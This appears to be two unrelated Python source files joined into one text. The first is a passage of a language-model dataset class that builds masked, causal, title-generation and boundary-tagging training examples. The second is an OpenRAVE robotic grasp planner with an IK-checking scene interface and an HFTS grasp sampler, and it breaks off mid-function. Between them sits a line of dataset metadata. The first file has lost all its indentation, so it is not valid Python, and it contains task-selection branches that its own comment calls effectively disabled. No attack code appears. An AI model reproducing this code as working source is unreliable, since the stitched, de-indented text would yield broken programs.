if content_position is not None:
source = np.append(source, src_item[content_position])
sep_positions_list.append(len(source) - 1)
sep_positions_list = [v for v in sep_positions_list if v != 0 and v != len(source) - 1]
source = torch.LongTensor(np.append(source, self.src_dict.eos()))
clm_target = torch.LongTensor(clm_target)
return source, clm_target, prev_output_positions_list, sep_positions_list
def _get_example_for_boundary_detection(self, index, src_item):
""" TokenClassification
Task: sequence tagging
"""
source, _, _, sep_positions_list = self._parse_ocr_data(src_item)
tag_target = torch.from_numpy(np.full(len(source), 1)) # 0: pad 1: negative 2: positive
tag_target[0] = self.cls_pad
tag_target[-1] = self.cls_pad
tag_target[sep_positions_list] = 2
if self.debug_size_for_tag < 2:
self.debug_size_for_tag += 1
logger.info('========= index: {} == boundary detection ======='.format(str(index)))
logger.info('src_raw: ' + ''.join([self.src_dict[ii] for ii in src_item]))
logger.info('src: ' + ''.join([self.src_dict[ii] for ii in source]))
logger.info('tag_target: ' + ''.join([str(ii.item()) for ii in tag_target]))
example = {
'id': index,
'source': source,
'cls_target': torch.LongTensor([self.cls_pad]),
'mlm_target': torch.from_numpy(np.full(len(source), self.src_dict.pad())),
'clm_target': torch.from_numpy(np.full(1, self.src_dict.pad())),
'tag_target': tag_target,
'prev_output_tokens': torch.from_numpy(np.full(1, 1)),
'prev_output_positions': torch.LongTensor([1]),
}
return example
def _create_dummy_data(self, task, **kwargs):
if task == 'cls':
src_label = torch.LongTensor([-1])
return src_label
if task == 'mlm':
mlm_target = torch.from_numpy(np.full(kwargs['src_sz'], self.src_dict.pad()))
return mlm_target
if task == 'clm':
prev_output_positions = torch.LongTensor([1])
prev_output_tokens = torch.from_numpy(np.full(1, 1))
clm_target = torch.from_numpy(np.full(1, self.src_dict.pad()))
return prev_output_positions, prev_output_tokens, clm_target
def _get_example_for_title_generation(self, index, src_item):
""" title generation
Task: CLM + MLM
"""
source, clm_target, prev_output_positions_list, _ = self._parse_ocr_data(src_item)
# build data for MLM (random mask)
mlm_positions = apply_random_mask(len(source), ignore_index=set(prev_output_positions_list))
masked_pos = sorted(list(set(prev_output_positions_list + mlm_positions)))
mlm_target = torch.from_numpy(np.full(len(source), self.src_dict.pad()))
mlm_target[mlm_positions] = source[mlm_positions]
# build data for CLM (mask all title)
prev_output_positions = np.array(prev_output_positions_list)
prev_output_tokens = source[prev_output_positions - 1].clone()
prev_output_positions = torch.LongTensor(prev_output_positions)
if self.debug_size_for_titlegen < 2:
logger.info('========= index: {} == title generation ======='.format(str(index)))
logger.info('src_raw: ' + ''.join([self.src_dict[ii] for ii in src_item]))
logger.info('src: ' + ''.join([self.src_dict[ii] for ii in source]))
source[masked_pos] = self.replace(source[masked_pos])
if self.debug_size_for_titlegen < 2:
self.debug_size_for_titlegen += 1
logger.info('src_mask: ' + ''.join([self.src_dict[ii] for ii in source]))
logger.info('clm_pos: ' + ' '.join([str(v) for v in prev_output_positions_list]))
logger.info('clm_input: ' + ''.join([self.src_dict[ii] for ii in prev_output_tokens]))
logger.info('clm_target: ' + ''.join([self.src_dict[ii] for ii in clm_target]))
logger.info(
'mlm_target:' + ''.join([self.src_dict[ii] for ii in mlm_target if ii != self.src_dict.pad_index]))
if prev_output_tokens.numel() == 0:
prev_output_positions, prev_output_tokens, clm_target = self._create_dummy_data('clm')
example = {
'id': index,
'source': source,
'cls_target': self._create_dummy_data('cls'),
'mlm_target': mlm_target,
'clm_target': clm_target,
'tag_target': torch.from_numpy(np.full(len(source), self.cls_pad)),
'prev_output_tokens': prev_output_tokens,
'prev_output_positions': prev_output_positions,
}
return example
def _get_example_for_cls(self, index, src_item, src_meta):
assert 'cls' in self.sub_task
src_meta = np.array([int(self.meta_dict[k]) if k != self.meta_dict.unk() else 10000 for k in src_meta])
src_sz = len(src_item)
assert len(src_meta) % 2 == 1
src_label, src_entity = torch.LongTensor(src_meta[:1]), src_meta[1:]
# build data for MLM & CLM
mlm_target = torch.from_numpy(np.full(src_sz, self.src_dict.pad()))
prev_output_positions, prev_output_tokens, clm_target = self._create_dummy_data('clm')
if self.debug_size_for_cls < 2:
logger.info('========= index: {} ==== MLM and CLM mask ====='.format(str(index)))
logger.info('src: ' + ''.join([self.src_dict[ii] for ii in src_item]))
if self.debug_size_for_cls < 2:
self.debug_size_for_cls += 1
example = {
'id': index,
'source': src_item,
'cls_target': src_label,
'mlm_target': mlm_target,
'clm_target': clm_target,
'tag_target': torch.from_numpy(np.full(len(src_item), self.cls_pad)),
'prev_output_tokens': prev_output_tokens,
'prev_output_positions': prev_output_positions,
}
return example
def _get_example_for_mlm(self, index, src_item, src_meta):
assert 'mlm' in self.sub_task
src_sz = len(src_item)
src_label = src_meta[0]
src_entity = src_meta[1:]
src_label = torch.LongTensor([int(self.meta_dict[src_label])]) \
if src_label >= self.meta_dict.nspecial else self._create_dummy_data('cls')
src_entity = np.array([int(self.meta_dict[k]) for k in src_entity])
assert len(src_entity) % 2 == 0
src_entity = np.array(src_entity.reshape(-1, 2)) + 1 # offset for [CLS]
# build data for MLM in Encoder
mlm_positions_1 = apply_entity_mask_for_mlm(src_sz, src_entity) # BERT & entity
mlm_positions_2 = apply_random_mask(src_sz, ignore_index=set(mlm_positions_1)) # BERT
mlm_position_list = sorted(list(set(mlm_positions_1 + mlm_positions_2)))
assert len(mlm_positions_1) + len(mlm_positions_2) == len(mlm_position_list)
masked_pos_list = sorted(list(set(mlm_position_list)))
assert masked_pos_list[0] > 0 # no mask in bos
masked_pos = np.array(masked_pos_list)
mlm_target = torch.from_numpy(np.full(src_sz, self.src_dict.pad()))
mlm_target[mlm_position_list] = src_item[mlm_position_list]
# build data for CLM in Decoder
prev_output_positions, prev_output_tokens, clm_target = self._create_dummy_data('clm')
if self.debug_size_for_mlm < 2:
logger.info('========= index: {} ==== MLM mask ====='.format(str(index)))
logger.info('src: ' + ''.join([self.src_dict[ii] for ii in src_item]))
logger.info('src_entity: ' + ' '.join(
[''.join([self.src_dict[src_item[ii]] if ii < src_sz else '' for ii in range(ent[0], ent[1])]) for ent
in src_entity]))
src_item[masked_pos] = self.replace(src_item[masked_pos])
if self.debug_size_for_mlm < 2:
self.debug_size_for_mlm += 1
logger.info('src_mask: ' + ''.join([self.src_dict[ii] for ii in src_item]))
logger.info('mlm_pos: ' + ' '.join([str(v) for v in mlm_position_list]))
logger.info(
'mlm_target:' + ''.join([self.src_dict[ii] for ii in mlm_target if ii != self.src_dict.pad_index]))
if prev_output_tokens.numel() == 0:
prev_output_positions, prev_output_tokens, clm_target = self._create_dummy_data('clm')
example = {
'id': index,
'source': src_item,
'cls_target': src_label,
'mlm_target': mlm_target,
'clm_target': clm_target,
'tag_target': torch.from_numpy(np.full(len(src_item), self.cls_pad)),
'prev_output_tokens': prev_output_tokens,
'prev_output_positions': prev_output_positions,
}
return example
def _get_example_for_clm(self, index, src_item, src_meta):
assert 'clm' in self.sub_task
src_meta = np.array([int(self.meta_dict[k])
                     if k != self.meta_dict.unk() else 10000 for k in src_meta])
src_sz = len(src_item)
assert len(src_meta) % 2 == 1
src_label, src_entity = torch.LongTensor(src_meta[:1]), src_meta[1:]
src_entity = np.array(src_entity.reshape(-1, 2)) + 1
src_label = self._create_dummy_data('cls')  # CLM does not use a sentence-classification label
# build data for CLM in Decoder
clm_position_list = np.array(apply_span_mask(src_sz - 1)) + 1  # offsets start at 1
prev_output_positions = clm_position_list
prev_output_tokens = src_item[prev_output_positions - 1].clone()
clm_target = src_item[prev_output_positions].clone()
prev_output_positions = torch.LongTensor(prev_output_positions)
# build data for MLM in Encoder
mlm_position_list = []
mlm_target = torch.from_numpy(np.full(src_sz, self.src_dict.pad()))
masked_pos = prev_output_positions
if self.debug_size_for_clm < 2:
logger.info('========= index: {} ==== CLM Mask ====='.format(str(index)))
logger.info('src: ' + ''.join([self.src_dict[ii] for ii in src_item]))
logger.info('src_entity: ' + ' '.join(
[''.join([self.src_dict[src_item[ii]] if ii < src_sz else '' for ii in range(ent[0], ent[1])]) for ent
in src_entity]))
src_item[masked_pos] = self.replace(src_item[masked_pos])
if self.debug_size_for_clm < 2:
self.debug_size_for_clm += 1
logger.info('src_mask: ' + ''.join([self.src_dict[ii] for ii in src_item]))
logger.info('clm_pos: ' + ' '.join([str(v) for v in clm_position_list]))
logger.info('clm_input: ' + ''.join([self.src_dict[ii] for ii in prev_output_tokens]))
logger.info('clm_target: ' + ''.join([self.src_dict[ii] for ii in clm_target]))
logger.info('mlm_pos: ' + ' '.join([str(v) for v in mlm_position_list]))
logger.info(
'mlm_target:' + ''.join([self.src_dict[ii] for ii in mlm_target if ii != self.src_dict.pad_index]))
if prev_output_tokens.numel() == 0:
prev_output_positions, prev_output_tokens, clm_target = self._create_dummy_data('clm')
example = {
'id': index,
'source': src_item,
'cls_target': src_label,
'mlm_target': mlm_target,
'clm_target': clm_target,
'tag_target': torch.from_numpy(np.full(len(src_item), self.cls_pad)),
'prev_output_tokens': prev_output_tokens,
'prev_output_positions': prev_output_positions,
}
return example
def _get_example_for_multitask(self, index, src_item, src_meta):
""" multi-task joint training
tasks:
- mlm: masked language model (encoder-only)
- clm: causal language model (encoder-decoder or decoder-only)
- sentcls: sentence classification (encoder-only)
- tokencls: token classification, sequence tagging (encoder-only)
- spancls: token span classification, such as relation classification, entity classification (encoder-only)
"""
assert 'clm' in self.sub_task or 'mlm' in self.sub_task
src_meta = np.array([int(self.meta_dict[k]) if k != self.meta_dict.unk() else 10000 for k in src_meta])
src_sz = len(src_item)
assert len(src_meta) % 2 == 1
src_label, src_entity = torch.LongTensor(src_meta[:1]), src_meta[1:]
src_entity = np.array(src_entity.reshape(-1, 2)) + 1 # offset for [CLS]
if 'sentcls' not in self.sub_task:
src_label = torch.LongTensor([self.cls_pad])
mlm_position_list, clm_position_list = [], []
if 'clm' in self.sub_task:
clm_position_list = apply_span_mask(src_sz)
prev_output_positions = np.array(clm_position_list)
if 'mlm' in self.sub_task:
mlm_positions_1 = apply_entity_mask_for_mlm(src_sz, src_entity,
ignore_index=set(clm_position_list)) # BERT & entity
mlm_positions_2 = apply_random_mask(src_sz, ignore_index=set(clm_position_list + mlm_positions_1)) # BERT
mlm_position_list = sorted(list(set(mlm_positions_1 + mlm_positions_2)))
assert len(mlm_positions_1) + len(mlm_positions_2) == len(mlm_position_list)
masked_pos_list = sorted(list(set(clm_position_list + mlm_position_list)))
assert len(clm_position_list) + len(mlm_position_list) == len(masked_pos_list)
assert masked_pos_list[0] > 0
masked_pos = np.array(masked_pos_list)
# build data for CLM in Decoder
prev_output_tokens = src_item[prev_output_positions - 1].clone()
clm_target = src_item[prev_output_positions].clone()
prev_output_positions = torch.LongTensor(prev_output_positions)
# build data for MLM in Encoder
mlm_target = torch.from_numpy(np.full(src_sz, self.src_dict.pad()))
mlm_target[mlm_position_list] = src_item[mlm_position_list]
if self.debug_size_for_mlm < 2:
logger.info('========= index: {} ==== MLM and CLM mask ====='.format(str(index)))
logger.info('src: ' + ''.join([self.src_dict[ii] for ii in src_item]))
logger.info('src_entity: ' + ' '.join(
[''.join([self.src_dict[src_item[ii]] if ii < src_sz else '' for ii in range(ent[0], ent[1])]) for ent
in src_entity]))
src_item[masked_pos] = self.replace(src_item[masked_pos])
if self.debug_size_for_mlm < 2:
self.debug_size_for_mlm += 1
logger.info('src_mask: ' + ''.join([self.src_dict[ii] for ii in src_item]))
logger.info('clm_pos: ' + ' '.join([str(v) for v in clm_position_list]))
logger.info('clm_input: ' + ''.join([self.src_dict[ii] for ii in prev_output_tokens]))
logger.info('clm_target: ' + ''.join([self.src_dict[ii] for ii in clm_target]))
logger.info('mlm_pos: ' + ' '.join([str(v) for v in mlm_position_list]))
logger.info(
'mlm_target:' + ''.join([self.src_dict[ii] for ii in mlm_target if ii != self.src_dict.pad_index]))
if prev_output_tokens.numel() == 0:
prev_output_positions, prev_output_tokens, clm_target = self._create_dummy_data('clm')
example = {
'id': index,
'source': src_item,
'cls_target': src_label,
'mlm_target': mlm_target,
'clm_target': clm_target,
'tag_target': torch.from_numpy(np.full(len(src_item), self.cls_pad)),
'prev_output_tokens': prev_output_tokens,
'prev_output_positions': prev_output_positions,
}
return example
def __getitem__(self, index):
"""
src: plain text
meta:
- content: cls_label ent1_start ent1_end ent2_start ent2_end
- desc: a cls_label of 0 represents "no label" and should be skipped in the cls task.
TODO:
dynamic_span_length, dynamic_total_length
"""
src_item = self.src[index]
src_meta = self.meta[index]
sep_sz = (src_item == self.src_dict.eos()).sum()
if sep_sz > 1: # ocr data tasks: titlegen segcls, sentcls
if 'titlegen' in self.sub_task and 'segcls' in self.sub_task:
task_selector = random.random()
if task_selector > 0.5:
example = self._get_example_for_title_generation(index, src_item)
else:
example = self._get_example_for_title_generation(index, src_item)
# example = self._get_example_for_boundary_detection(index, src_item)  # double-check this
elif 'segcls' in self.sub_task:
example = self._get_example_for_boundary_detection(index, src_item)
elif 'titlegen' in self.sub_task:
example = self._get_example_for_title_generation(index, src_item)
else:
return
return example
else: # product summary data tasks:
task_selector = random.random()
# NOTE: task_selector > 0 is (almost) always true, so the clm/multitask
# branches below are effectively disabled; the commented thresholds show
# the intended task mix.
if task_selector > 0:
# if task_selector < 0:
# if task_selector < 0.4:
return self._get_example_for_mlm(index, src_item, src_meta)
elif task_selector < 0.7:
# elif task_selector < 2:
return self._get_example_for_clm(index, src_item, src_meta)
else:
return self._get_example_for_clm(index, src_item, src_meta)
# return self._get_example_for_cls(index, src_item, src_meta) #
return self._get_example_for_multitask(index, src_item, src_meta)
def collater(self, samples):
return collate(samples, self.src_dict.pad(), self.src_dict.eos())
def replace(self, x):
_x_real = x
_x_rand = _x_real.clone().random_(self.src_dict.nspecial, len(self.src_dict))
_x_mask = _x_real.clone().fill_(self.mask_idx)
probs = torch.multinomial(self.pred_probs, len(x), replacement=True)
_x = _x_mask * (probs == 0).long() + \
_x_real * (probs == 1).long() + \
_x_rand * (probs == 2).long()
return _x
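# Hedged note on replace(): with the defaults above, pred_probs works out to
# [0.8, 0.1, 0.1], i.e. the BERT-style split -- probs == 0 inserts mask_idx,
# probs == 1 keeps the original token, probs == 2 draws a random token,
# decided independently per masked position.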
| 1.953125
| 2
|
src/hfts_grasp_planner/core.py
|
malwaru/hfts_grasp_planner
| 3
|
12782911
|
#! /usr/bin/python
import numpy as np
import math
from scipy.spatial import KDTree
import openravepy as orpy
import transformations
from robotiqloader import RobotiqHand, InvalidTriangleException
import sys, time, logging, copy
import itertools
from utils import ObjectFileIO, clamp, compute_grasp_stability, normal_distance, position_distance, dist_in_range
import rospy
import scipy.optimize
class PlanningSceneInterface(object):
def __init__(self, or_env, robot_name):
""" Sets scene information for grasp planning that considers the whole robot.
@param or_env OpenRAVE environment containing the whole planning scene and robot
@param robot_name Name of the robot on which the hand is attached (for ik computations)
"""
self._or_env = or_env
self._robot = or_env.GetRobot(robot_name)
self._manip = self._robot.GetActiveManipulator()
self._arm_ik = orpy.databases.inversekinematics.InverseKinematicsModel(self._robot,
iktype=orpy.IkParameterization.Type.Transform6D)
# Make sure we have an ik solver
if not self._arm_ik.load():
rospy.loginfo('No IKFast solver found. Generating new one...')
self._arm_ik.autogenerate()
self._object = None
def set_target_object(self, obj_name):
self._object = self._or_env.GetKinBody(obj_name)
def check_arm_ik(self, hand_pose_object, grasp_conf, seed, open_hand_offset):
with self._or_env:
# compute target pose in world frame
object_pose = self._object.GetTransform()
hand_pose_scene = np.dot(object_pose, hand_pose_object)
# save current state
dof_values = self._robot.GetDOFValues()
# if we have a seed set it
arm_dofs = self._manip.GetArmIndices()
hand_dofs = self._manip.GetGripperIndices()
if seed is not None:
self._robot.SetDOFValues(seed, dofindices=arm_dofs)
# Compute a pre-grasp hand configuration and set it
pre_grasp_conf = np.asarray(grasp_conf) - open_hand_offset
lower_limits, upper_limits = self._robot.GetDOFLimits(hand_dofs)
pre_grasp_conf = np.asarray(clamp(pre_grasp_conf, lower_limits, upper_limits))
self._robot.SetDOFValues(pre_grasp_conf, dofindices=hand_dofs)
# Now find an ik solution for the target pose with the hand in the pre-grasp configuration
sol = self._manip.FindIKSolution(hand_pose_scene, orpy.IkFilterOptions.CheckEnvCollisions)
# sol = self.seven_dof_ik(hand_pose_scene, orpy.IkFilterOptions.CheckEnvCollisions)
# If that didn't work, try to compute a solution that is in collision (may be useful anyways)
if sol is None:
# sol = self.seven_dof_ik(hand_pose_scene, orpy.IkFilterOptions.IgnoreCustomFilters)
sol = self._manip.FindIKSolution(hand_pose_scene, orpy.IkFilterOptions.IgnoreCustomFilters)
b_sol_col_free = False
else:
b_sol_col_free = True
# Restore original dof values
self._robot.SetDOFValues(dof_values)
return b_sol_col_free, sol, pre_grasp_conf
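# Usage sketch for PlanningSceneInterface (illustrative; the environment file,
# robot name, object name, and the 2-DOF grasp configuration below are
# hypothetical placeholders, not part of the original module):
def _example_check_arm_ik():
    env = orpy.Environment()
    env.Load('scene.env.xml')  # hypothetical scene containing robot and object
    scene = PlanningSceneInterface(env, 'robot')
    scene.set_target_object('target_object')
    hand_pose_object = np.eye(4)  # grasp pose expressed in the object frame
    collision_free, arm_conf, pre_grasp_conf = scene.check_arm_ik(
        hand_pose_object, grasp_conf=[0.0, 0.0], seed=None, open_hand_offset=0.1)
    return collision_free, arm_conf, pre_grasp_conf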
class HFTSSampler:
def __init__(self, object_io_interface, scene_interface=None, verbose=False, num_hops=2, vis=False):
self._verbose = verbose
self._sampler_viewer = vis
self._orEnv = orpy.Environment() # create openrave environment
self._orEnv.SetDebugLevel(orpy.DebugLevel.Fatal)
self._orEnv.GetCollisionChecker().SetCollisionOptions(orpy.CollisionOptions.Contacts)
if vis:
self._orEnv.SetViewer('qtcoin') # attach viewer (optional)
self._or_handles = []
else:
self._or_handles = None
self._scene_or_env = None
self._hand_loaded = False
self._scene_interface = scene_interface
self._obj_loaded = False
self._max_iters = 40
self._reachability_weight = 1.0
self._mu = 2.0
self._min_stability = 0.0
self._b_force_new_hfts = False
self._object_kd_tree = None
self._object_points = None
# self._hops = num_hops
        # TODO remove this again; num_hops is temporarily hard-coded to 2 below
self._hops = 2
self._robot = None
self._obj = None
self._obj_com = None
self._data_labeled = None
self._hand_manifold = None
self._num_contacts = None
self._contact_combinations = []
self._num_levels = 0
self._branching_factors = []
self._object_io_interface = object_io_interface
def __del__(self):
orpy.RaveDestroy()
def check_arm_grasp_validity(self, grasp_conf, grasp_pose, seed, open_hand_offset=0.1):
if self._scene_interface is None:
#TODO Think about what we should do in this case (planning with free-floating hand)
return True, None, None
object_hfts_pose = self._obj.GetTransform() # pose in environment used for contact planning
hand_pose_object_frame = np.dot(np.linalg.inv(object_hfts_pose), grasp_pose)
# hand_pose_world = np.dot(object_hfts_pose, grasp_pose)
collision_free, arm_conf, pre_grasp_conf = \
self._scene_interface.check_arm_ik(hand_pose_object_frame,
grasp_conf,
seed=seed,
open_hand_offset=open_hand_offset)
return collision_free, arm_conf, pre_grasp_conf
def check_grasp_validity(self):
# Check whether the hand is collision free
if self._robot.CheckSelfCollision():
return False
real_contacts = self.get_real_contacts()
# self.draw_contacts(real_contacts)
stability = compute_grasp_stability(grasp_contacts=real_contacts,
mu=self._mu)
return stability > self._min_stability and self.is_grasp_collision_free()
def create_object_kd_tree(self, points):
self._object_kd_tree = KDTree(points[:, :3])
self._object_points = points
def compute_allowed_contact_combinations(self, depth, label_cache):
# Now, for this parent get all possible contacts
allowed_finger_combos = set(self._contact_combinations[depth])
# Next, we want to filter out contact combinations that are stored in labelCache
forbidden_finger_combos = set()
for grasp_label in label_cache:
finger_combo = tuple([x[-1] for x in grasp_label])
forbidden_finger_combos.add(finger_combo)
# Filter them out
allowed_finger_combos.difference_update(forbidden_finger_combos)
return list(allowed_finger_combos)
def compute_contact_combinations(self):
while len(self._contact_combinations) < self._num_levels:
self._contact_combinations.append([])
for i in range(self._num_levels):
self._contact_combinations[i] = set(itertools.product(range(self._branching_factors[i]),
repeat=self._num_contacts))
def compose_grasp_info(self, contact_labels):
contacts = [] # a list of contact positions and normals
for i in range(self._num_contacts):
p, n = self.get_cluster_repr(contact_labels[i])
contacts.append(list(p) + list(n))
object_contacts = np.asarray(contacts)
code_tmp = self._hand_manifold.encode_grasp(object_contacts)
dummy, grasp_conf = self._hand_manifold.predict_hand_conf(code_tmp)
hand_contacts = self._robot.get_ori_tip_pn(grasp_conf)
return grasp_conf, object_contacts, hand_contacts
def _debug_visualize_quality(self, labels, quality, handles):
grasp_conf, object_contacts, hand_contacts = self.compose_grasp_info(labels)
self._robot.SetVisible(False)
handles.append(self._draw_contacts_quality(object_contacts, quality))
def _draw_contacts_quality(self, object_contacts, quality):
colors = [[1, 0, 0, 1], [0, 1, 0, 1], [0, 0, 1, 1]]
quality = min(abs(quality), 0.005)
width = 0.003
length = max((1.0 - abs(quality) / 0.005) * 0.05, 0.001)
# Draw planned contacts
arrow_handles = []
for i in range(object_contacts.shape[0]):
arrow_handles.append(self._orEnv.drawarrow(object_contacts[i, :3],
object_contacts[i, :3] - length * object_contacts[i, 3:],
width, colors[i]))
return arrow_handles
def _debug_visualize(self, labels, handle_index=-1):
grasp_conf, object_contacts, hand_contacts = self.compose_grasp_info(labels)
rospy.logwarn('Debug visualize')
# self._robot.SetVisible(False)
# self.draw_contacts(object_contacts, handle_index=handle_index)
# time.sleep(1.0)
# self._robot.SetVisible(True)
def draw_contacts(self, object_contacts, handle_index=-1):
if len(self._or_handles) == 0:
self._or_handles.append(None)
self._or_handles.append(None)
# TODO this is hard coded for three contacts
colors = [[1, 0, 0, 1], [0, 1, 0, 1], [0, 0, 1, 1]]
if handle_index != 0:
width = 0.003
length = 0.05
else:
width = 0.001
length = 0.1
# Draw planned contacts
arrow_handles = []
for i in range(object_contacts.shape[0]):
arrow_handles.append(self._orEnv.drawarrow(object_contacts[i, :3],
object_contacts[i, :3] - length * object_contacts[i, 3:],
width, colors[i]))
self._or_handles[handle_index] = arrow_handles
def evaluate_grasp(self, contact_label):
contacts = [] # a list of contact positions and normals
for i in range(self._num_contacts):
p, n = self.get_cluster_repr(contact_label[i])
contacts.append(list(p) + list(n))
contacts = np.asarray(contacts)
# self.draw_contacts(contacts)
s_tmp = self._hand_manifold.compute_grasp_quality(self._obj_com, contacts)
code_tmp = self._hand_manifold.encode_grasp(contacts)
r_tmp, dummy = self._hand_manifold.predict_hand_conf(code_tmp)
# TODO: Research topic. This is kind of hack. Another objective function might be better
# o_tmp = s_tmp / (r_tmp + 0.000001)
o_tmp = s_tmp - self._reachability_weight * r_tmp
assert not math.isnan(o_tmp) and not math.isinf(math.fabs(o_tmp))
# o_tmp = s_tmp / (r_tmp + 1.0)
# return s_tmp, r_tmp, o_tmp
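        # NOTE: the objective o_tmp computed above is currently overridden;
        # only the negated reachability term is returned below.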
return s_tmp, r_tmp, -r_tmp
def extend_hfts_node(self, old_labels, allowed_finger_combos=None):
new_depth = len(old_labels[0]) # a label has length depth + 1
if allowed_finger_combos is not None:
fingertip_assignments = np.random.choice(allowed_finger_combos)
else:
fingertip_assignments = np.random.choice(self._branching_factors[new_depth],
self._num_contacts,
replace=True)
for label, assignment in itertools.izip(old_labels, fingertip_assignments):
label.append(assignment)
s_tmp, r_tmp, o_tmp = self.evaluate_grasp(old_labels)
# self._debug_visualize(old_labels, 0)
return o_tmp, old_labels
def get_branch_information(self, level):
if level < self.get_maximum_depth():
possible_num_children = pow(self._branching_factors[level] + 1, self._num_contacts)
possible_num_leaves = 1
            for d in range(level, self.get_maximum_depth()):
                possible_num_leaves *= pow(self._branching_factors[d] + 1, self._num_contacts)
else:
possible_num_children = 0
possible_num_leaves = 1
return possible_num_children, possible_num_leaves
def get_cluster_repr(self, label):
level = len(label) - 1 # indexed from 0
idx = np.where((self._data_labeled[:, 6:7 + level] == label).all(axis=1))
points = [self._data_labeled[t, 0:3] for t in idx][0]
normals = [self._data_labeled[t, 3:6] for t in idx][0]
pos = np.sum(points, axis=0) / len(idx[0])
normal = np.sum(normals, axis=0) / len(idx[0])
normal /= np.linalg.norm(normal)
return pos, -normal
def get_maximum_depth(self):
return self._num_levels
def get_or_hand(self):
return self._robot
def get_random_sibling_label(self, label):
ret = []
if len(label) <= self._hops / 2:
for i in range(len(label)):
ret.append(np.random.randint(self._branching_factors[i]))
else:
match_len = len(label) - self._hops / 2
ret = label[:match_len]
for i in range(len(label) - match_len):
ret.append(np.random.randint(self._branching_factors[i + match_len]))
return ret
def get_random_sibling_labels(self, curr_labels, allowed_finger_combos=None):
labels_tmp = []
if allowed_finger_combos is None:
for i in range(self._num_contacts):
tmp = self.get_random_sibling_label(curr_labels[i])
labels_tmp.append(tmp)
else:
finger_combo = np.random.choice(allowed_finger_combos)
for i in range(self._num_contacts):
tmp = list(curr_labels[i])
tmp[-1] = finger_combo[i]
labels_tmp.append(tmp)
return labels_tmp
def get_real_contacts(self):
collision_report = orpy.CollisionReport()
real_contacts = []
# iterate over all fingertip links and determine the contacts
for eel in self._robot.get_fingertip_links():
link = self._robot.GetLink(eel)
self._orEnv.CheckCollision(self._obj, link, report=collision_report)
# self._orEnv.CheckCollision(link, self._obj, report=collision_report)
if len(collision_report.contacts) == 0:
raise ValueError('[HFTSSampler::get_real_contacts] No contacts found')
# TODO the normals reported by the collision check are wrong, so instead we use a nearest
# TODO neighbor lookup. Should see what's wrong with OpenRAVE here...
            position = collision_report.contacts[0].pos
            _, nearest_idx = self._object_kd_tree.query(position)
            normal = self._object_points[nearest_idx, 3:]
# normal = collision_report.contacts[0].norm
real_contacts.append(np.concatenate((position, normal)))
real_contacts = np.asarray(real_contacts)
return real_contacts
def get_root_node(self):
possible_num_children, possible_num_leaves = self.get_branch_information(0)
return HFTSNode(num_possible_children=possible_num_children,
num_possible_leaves=possible_num_leaves)
def is_grasp_collision_free(self):
links = self._robot.get_non_fingertip_links()
for link in links:
if self._orEnv.CheckCollision(self._robot.GetLink(link)):
return False
return True
def load_hand(self, hand_file, hand_cache_file):
if not self._hand_loaded:
# TODO make this Robotiq hand independent (external hand loader)
self._robot = RobotiqHand(hand_cache_file=hand_cache_file,
env=self._orEnv, hand_file=hand_file)
self._hand_manifold = self._robot.get_hand_manifold()
self._hand_manifold.load()
self._num_contacts = self._robot.get_contact_number()
shift = transformations.identity_matrix()
shift[0, -1] = 0.2
self._robot.SetTransform(shift)
rospy.loginfo('Hand loaded in OpenRAVE environment')
self._hand_loaded = True
def load_object(self, obj_id, model_id=None):
if model_id is None:
model_id = obj_id
self._data_labeled, self._branching_factors, self._obj_com = \
self._object_io_interface.get_hfts(model_id, self._b_force_new_hfts)
if self._data_labeled is None:
raise RuntimeError('Could not load HFTS model for model ' + model_id)
self.create_object_kd_tree(self._data_labeled[:, :6])
self._num_levels = len(self._branching_factors)
# First, delete old object if there is any
if self._obj_loaded:
self._orEnv.Remove(self._obj)
or_file_name = self._object_io_interface.get_openrave_file_name(model_id)
self._obj_loaded = self._orEnv.Load(or_file_name)
if not self._obj_loaded:
raise RuntimeError('Could not load object model %s in OpenRAVE' % model_id)
self._obj = self._orEnv.GetKinBody('objectModel')
rospy.loginfo('Object loaded in OpenRAVE environment')
if self._scene_interface is not None:
self._scene_interface.set_target_object(obj_id)
self.compute_contact_combinations()
self._obj_loaded = True
def sample_grasp(self, node, depth_limit, post_opt=False, label_cache=None, open_hand_offset=0.1):
if depth_limit < 0:
raise ValueError('HFTSSampler::sample_grasp depth limit must be greater or equal to zero.')
if node.get_depth() >= self._num_levels:
raise ValueError('HFTSSampler::sample_grasp input node has an invalid depth')
if node.get_depth() + depth_limit >= self._num_levels:
depth_limit = self._num_levels - node.get_depth() # cap
        # In case we are using the integrated method, we might be restricted in
        # which nodes we may descend to, so let's compute this set.
allowed_finger_combos = None
if label_cache is not None and depth_limit == 1:
# TODO This currently only works for hops == 2
assert self._hops == 2
allowed_finger_combos = self.compute_allowed_contact_combinations(node.get_depth(), label_cache)
rospy.logdebug('[HFTSSampler::sample_grasp] We have %i allowed contacts' % len(allowed_finger_combos))
if len(allowed_finger_combos) == 0:
rospy.logwarn('[HFTSSampler::sample_grasp] We have no allowed contacts left! Aborting.')
return node
elif label_cache is not None and depth_limit != 1:
raise ValueError('[HFTSSampler::sample_grasp] Label cache only works for depth_limit == 1')
# Now, get a node to start stochastic optimization from
seed_ik = None
if node.get_depth() == 0: # at root
contact_label = self.pick_new_start_node()
best_o = -np.inf # need to also consider non-root nodes
else:
# If we are not at a leaf node, go down in the hierarchy
seed_ik = node.get_arm_configuration()
contact_label = copy.deepcopy(node.get_labels())
best_o, contact_label = self.extend_hfts_node(contact_label,
allowed_finger_combos=allowed_finger_combos)
self.reset_robot()
depth_limit -= 1
rospy.logdebug('[HFTSSampler::sample_grasp] Sampling a grasp; %i number of iterations' % self._max_iters)
# Do stochastic optimization until depth_limit is reached
while depth_limit >= 0:
# Randomly select siblings to optimize the objective function
for iter_now in range(self._max_iters):
labels_tmp = self.get_random_sibling_labels(curr_labels=contact_label,
allowed_finger_combos=allowed_finger_combos)
s_tmp, r_tmp, o_tmp = self.evaluate_grasp(labels_tmp)
if self.shc_evaluation(o_tmp, best_o):
contact_label = labels_tmp
best_o = o_tmp
# self._debug_visualize(labels_tmp, handle_index=0)
# Descend to next level if we iterate at least once more
if depth_limit > 0:
best_o, contact_label = self.extend_hfts_node(contact_label)
depth_limit -= 1
# Evaluate grasp on robot hand
# First, determine a hand configuration and the contact locations
grasp_conf, object_contacts, hand_contacts = self.compose_grasp_info(contact_label)
# Simulate the grasp and do local adjustments
b_robotiq_ok, grasp_conf, grasp_pose = self.simulate_grasp(grasp_conf=grasp_conf,
hand_contacts=hand_contacts,
object_contacts=object_contacts,
post_opt=post_opt,
swap_contacts=label_cache is None)
if b_robotiq_ok:
sample_q = 0
stability = best_o
else:
sample_q = 4
stability = 0.0
# except InvalidTriangleException:
